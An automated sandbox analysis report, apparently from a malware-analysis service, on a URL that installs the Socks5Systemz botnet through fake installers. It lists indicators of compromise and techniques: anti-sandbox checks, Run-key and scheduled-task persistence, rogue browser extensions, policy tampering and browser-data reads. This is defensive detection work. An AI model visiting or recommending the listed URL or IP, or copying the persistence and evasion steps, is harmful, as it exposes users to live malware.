Overview
overview
10Static
static
1URLScan
urlscan
1https://ify.ac/1IZk
windows11-21h2-x64
10https://ify.ac/1IZk
windows10-1703-x64
8https://ify.ac/1IZk
windows10-2004-x64
10https://ify.ac/1IZk
windows11-21h2-x64
10https://ify.ac/1IZk
android-10-x64
1https://ify.ac/1IZk
android-11-x64
1https://ify.ac/1IZk
ubuntu-18.04-amd64
3https://ify.ac/1IZk
ubuntu-20.04-amd64
4https://ify.ac/1IZk
ubuntu-22.04-amd64
3https://ify.ac/1IZk
ubuntu-24.04-amd64
4Analysis
-
max time kernel
450s -
max time network
448s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
16-07-2024 05:11
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://ify.ac/1IZk
Resource
win11-20240709-en
Behavioral task
behavioral2
Sample
https://ify.ac/1IZk
Resource
win10-20240611-en
Behavioral task
behavioral3
Sample
https://ify.ac/1IZk
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
https://ify.ac/1IZk
Resource
win11-20240709-en
Behavioral task
behavioral5
Sample
https://ify.ac/1IZk
Resource
android-x64-20240624-en
Behavioral task
behavioral6
Sample
https://ify.ac/1IZk
Resource
android-x64-arm64-20240624-en
Behavioral task
behavioral7
Sample
https://ify.ac/1IZk
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral8
Sample
https://ify.ac/1IZk
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral9
Sample
https://ify.ac/1IZk
Resource
ubuntu2204-amd64-20240522.1-en
Behavioral task
behavioral10
Sample
https://ify.ac/1IZk
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
https://ify.ac/1IZk
Malware Config
Signatures
-
Detect Socks5Systemz Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/492-888-0x0000000000BA0000-0x0000000000C42000-memory.dmp family_socks5systemz -
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 117 5040 rundll32.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepid process 4144 powershell.exe 1868 powershell.exe 2028 powershell.exe 5300 powershell.exe 4144 powershell.exe 2400 powershell.EXE 1448 powershell.exe 3936 powershell.exe 6020 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
2WsCboUrj.exerundll32.exeUzcFeLB.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2WsCboUrj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UzcFeLB.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
XPYXLum.exeOZhxUQi.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\International\Geo\Nation XPYXLum.exe Key value queried \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\International\Geo\Nation OZhxUQi.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_34Uv1hLE7B.tmpdjminoradequate.exe07FQtEghQ.exeTVCwEHwXmrhkdZhEKh.exeTVCwEHwXmrhkdZhEKh.tmpbSWFf7XkEILq.exefreevideoplayer.exesetup.exefreevideoplayer.exesetup.exesetup.exesetup.exesetup.exeAssistant_111.0.5168.25_Setup.exe_sfx.exe2WsCboUrj.exeassistant_installer.exeassistant_installer.exe2WsCboUrj.exeXPYXLum.exeUzcFeLB.exesetup_34Uv1hLE7B.tmpsetup.exedjminoradequate.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exepid process 6088 setup_34Uv1hLE7B.tmp 5828 djminoradequate.exe 3576 07FQtEghQ.exe 6064 TVCwEHwXmrhkdZhEKh.exe 5208 TVCwEHwXmrhkdZhEKh.tmp 4448 bSWFf7XkEILq.exe 2012 freevideoplayer.exe 5752 setup.exe 492 freevideoplayer.exe 2880 setup.exe 5452 setup.exe 4800 setup.exe 5464 setup.exe 3552 Assistant_111.0.5168.25_Setup.exe_sfx.exe 716 2WsCboUrj.exe 3476 assistant_installer.exe 6068 assistant_installer.exe 1916 2WsCboUrj.exe 2984 XPYXLum.exe 3184 UzcFeLB.exe 5628 setup_34Uv1hLE7B.tmp 2276 setup.exe 1980 djminoradequate.exe 3584 Snetchball.exe 5692 Snetchball.exe 5604 Snetchball.exe 3832 Snetchball.exe 1948 Snetchball.exe 5192 Snetchball.exe 3176 Snetchball.exe 5960 Snetchball.exe 5788 Snetchball.exe 5640 Snetchball.exe 5380 Snetchball.exe 1312 Snetchball.exe 940 Snetchball.exe 240 Snetchball.exe 2636 Snetchball.exe 3896 Snetchball.exe 6048 Snetchball.exe 1264 Snetchball.exe 1076 Snetchball.exe 4488 Snetchball.exe 3572 Snetchball.exe 3768 Snetchball.exe 1436 Snetchball.exe 3464 Snetchball.exe 1788 Snetchball.exe 5612 Snetchball.exe 3856 Snetchball.exe 4060 Snetchball.exe 2116 Snetchball.exe 5180 Snetchball.exe 2956 Snetchball.exe 1452 Snetchball.exe 3276 Snetchball.exe 3084 Snetchball.exe 4924 Snetchball.exe 4716 Snetchball.exe 3656 Snetchball.exe 1792 Snetchball.exe 1044 Snetchball.exe 5064 Snetchball.exe 196 Snetchball.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_34Uv1hLE7B.tmp07FQtEghQ.exeTVCwEHwXmrhkdZhEKh.tmpsetup.exesetup.exesetup.exesetup.exesetup.exeassistant_installer.exeassistant_installer.exerundll32.exesetup_34Uv1hLE7B.tmpsetup.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exeSnetchball.exepid process 6088 setup_34Uv1hLE7B.tmp 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 3576 07FQtEghQ.exe 5208 TVCwEHwXmrhkdZhEKh.tmp 5752 setup.exe 2880 setup.exe 5452 setup.exe 4800 setup.exe 5464 setup.exe 3476 assistant_installer.exe 3476 assistant_installer.exe 6068 assistant_installer.exe 6068 assistant_installer.exe 5040 rundll32.exe 5628 setup_34Uv1hLE7B.tmp 2276 setup.exe 3584 Snetchball.exe 3584 Snetchball.exe 3584 Snetchball.exe 3584 Snetchball.exe 3584 Snetchball.exe 3584 Snetchball.exe 3584 Snetchball.exe 3584 Snetchball.exe 5692 Snetchball.exe 5692 Snetchball.exe 3832 Snetchball.exe 3832 Snetchball.exe 5604 Snetchball.exe 5604 Snetchball.exe 1948 Snetchball.exe 1948 Snetchball.exe 3832 Snetchball.exe 3832 Snetchball.exe 5604 Snetchball.exe 5604 Snetchball.exe 5692 Snetchball.exe 5692 Snetchball.exe 1948 Snetchball.exe 1948 Snetchball.exe 5192 Snetchball.exe 5192 Snetchball.exe 5192 Snetchball.exe 5192 Snetchball.exe 5604 Snetchball.exe 3832 Snetchball.exe 5604 Snetchball.exe 3832 Snetchball.exe 5692 Snetchball.exe 5692 Snetchball.exe 1948 Snetchball.exe 1948 Snetchball.exe 5692 Snetchball.exe 5692 Snetchball.exe 5692 Snetchball.exe 5692 Snetchball.exe 5192 Snetchball.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 141.98.234.31 -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
setup.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
Processes:
XPYXLum.exeOZhxUQi.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json XPYXLum.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json OZhxUQi.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json XPYXLum.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
XPYXLum.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini XPYXLum.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
setup.exesetup.exedescription ioc process File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe -
Drops file in System32 directory 33 IoCs
Processes:
XPYXLum.exepowershell.exepowershell.exepowershell.exe2WsCboUrj.exeOZhxUQi.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 XPYXLum.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini 2WsCboUrj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 XPYXLum.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol OZhxUQi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2WsCboUrj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 XPYXLum.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE XPYXLum.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 XPYXLum.exe -
Drops file in Program Files directory 25 IoCs
Processes:
OZhxUQi.exeXPYXLum.exedescription ioc process File created C:\Program Files (x86)\AMqhlrBDqRJU2\wCaWHkT.xml OZhxUQi.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja XPYXLum.exe File created C:\Program Files (x86)\AMqhlrBDqRJU2\trBBEOxWRGajP.dll XPYXLum.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi OZhxUQi.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak XPYXLum.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak XPYXLum.exe File created C:\Program Files (x86)\hMiQKFvmPLjeC\rnhhQTp.dll XPYXLum.exe File created C:\Program Files (x86)\hMiQKFvmPLjeC\jPLBMmW.xml XPYXLum.exe File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\jiEkRSB.dll OZhxUQi.exe File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\knrdzvi.xml OZhxUQi.exe File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\PzuEZpw.dll XPYXLum.exe File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\uaMQFLy.xml XPYXLum.exe File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi OZhxUQi.exe File created C:\Program Files (x86)\AMqhlrBDqRJU2\USRawYq.xml XPYXLum.exe File created C:\Program Files (x86)\UQtSSXvqU\xlHRzsY.xml XPYXLum.exe File created C:\Program Files (x86)\UQtSSXvqU\HWxvob.dll OZhxUQi.exe File created C:\Program Files (x86)\ezMWJXFFLyUn\fMVQVYC.dll OZhxUQi.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi XPYXLum.exe File created C:\Program Files (x86)\AMqhlrBDqRJU2\KHkWxxJvqoebX.dll OZhxUQi.exe File created C:\Program Files (x86)\UQtSSXvqU\rBOWGj.dll XPYXLum.exe File created C:\Program Files (x86)\hMiQKFvmPLjeC\bLbuwzk.xml OZhxUQi.exe File created C:\Program Files (x86)\UQtSSXvqU\EplivAd.xml OZhxUQi.exe File created C:\Program Files (x86)\hMiQKFvmPLjeC\oBDUFQf.dll OZhxUQi.exe File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi XPYXLum.exe File created C:\Program Files (x86)\ezMWJXFFLyUn\idEnVJv.dll XPYXLum.exe -
Drops file in Windows directory 9 IoCs
Processes:
schtasks.exeschtasks.exeSnetchball.exeSnetchball.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\OcPshDNvhDnVmSv.job schtasks.exe File created C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job schtasks.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File created C:\Windows\Tasks\OcPshDNvhDnVmSv.job schtasks.exe File created C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job schtasks.exe File created C:\Windows\Tasks\MRTHivZIQsRdEanwm.job schtasks.exe File opened for modification C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job schtasks.exe File created C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 960 5828 WerFault.exe djminoradequate.exe 3688 5828 WerFault.exe djminoradequate.exe 1916 5828 WerFault.exe djminoradequate.exe 1712 5828 WerFault.exe djminoradequate.exe 1184 5828 WerFault.exe djminoradequate.exe 4752 5828 WerFault.exe djminoradequate.exe 4868 5828 WerFault.exe djminoradequate.exe 716 5828 WerFault.exe djminoradequate.exe 5448 5828 WerFault.exe djminoradequate.exe 5516 5828 WerFault.exe djminoradequate.exe 1076 5828 WerFault.exe djminoradequate.exe 3504 5828 WerFault.exe djminoradequate.exe 5156 5828 WerFault.exe djminoradequate.exe 1868 5828 WerFault.exe djminoradequate.exe 5296 5828 WerFault.exe djminoradequate.exe 4832 5828 WerFault.exe djminoradequate.exe 5420 5828 WerFault.exe djminoradequate.exe 4952 5828 WerFault.exe djminoradequate.exe 4940 5828 WerFault.exe djminoradequate.exe 5672 5828 WerFault.exe djminoradequate.exe 4080 5828 WerFault.exe djminoradequate.exe 2408 5828 WerFault.exe djminoradequate.exe 3444 5828 WerFault.exe djminoradequate.exe 3436 5828 WerFault.exe djminoradequate.exe 5884 5828 WerFault.exe djminoradequate.exe 756 5828 WerFault.exe djminoradequate.exe 580 5828 WerFault.exe djminoradequate.exe 3140 5828 WerFault.exe djminoradequate.exe 4640 5828 WerFault.exe djminoradequate.exe 4212 5828 WerFault.exe djminoradequate.exe 1596 5828 WerFault.exe djminoradequate.exe 1712 5828 WerFault.exe djminoradequate.exe 3060 5828 WerFault.exe djminoradequate.exe 5752 5828 WerFault.exe djminoradequate.exe 1436 5828 WerFault.exe djminoradequate.exe 1212 5828 WerFault.exe djminoradequate.exe 4228 5828 WerFault.exe djminoradequate.exe 864 5828 WerFault.exe djminoradequate.exe 1240 5828 WerFault.exe djminoradequate.exe 5628 5828 WerFault.exe djminoradequate.exe 5132 5828 WerFault.exe djminoradequate.exe 404 5828 WerFault.exe djminoradequate.exe 896 5828 WerFault.exe djminoradequate.exe 5708 5828 WerFault.exe djminoradequate.exe 1912 5828 WerFault.exe djminoradequate.exe 5212 5828 WerFault.exe djminoradequate.exe 1868 5828 WerFault.exe djminoradequate.exe 6084 5828 WerFault.exe djminoradequate.exe 1776 5828 WerFault.exe djminoradequate.exe 5368 5828 WerFault.exe djminoradequate.exe 4736 5828 WerFault.exe djminoradequate.exe 2628 5828 WerFault.exe djminoradequate.exe 5356 5828 WerFault.exe djminoradequate.exe 3716 5828 WerFault.exe djminoradequate.exe 4512 5828 WerFault.exe djminoradequate.exe 5468 5828 WerFault.exe djminoradequate.exe 2184 5828 WerFault.exe djminoradequate.exe 1080 1916 WerFault.exe 2WsCboUrj.exe 2168 5828 WerFault.exe djminoradequate.exe 3336 5828 WerFault.exe djminoradequate.exe 4216 5828 WerFault.exe djminoradequate.exe 2332 1980 WerFault.exe djminoradequate.exe 1312 5316 WerFault.exe UzcFeLB.exe 864 5828 WerFault.exe djminoradequate.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe nsis_installer_2 -
Enumerates system info in registry 2 TTPs 15 IoCs
Processes:
msedge.exerundll32.exemsedge.exeUzcFeLB.exemsedge.exe2WsCboUrj.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS UzcFeLB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName UzcFeLB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName 2WsCboUrj.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS 2WsCboUrj.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies Control Panel 2 IoCs
Processes:
Snetchball.exeSnetchball.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe Set value (str) \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" Snetchball.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exeOZhxUQi.exepowershell.exepowershell.exepowershell.exerundll32.exeXPYXLum.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts OZhxUQi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OZhxUQi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe 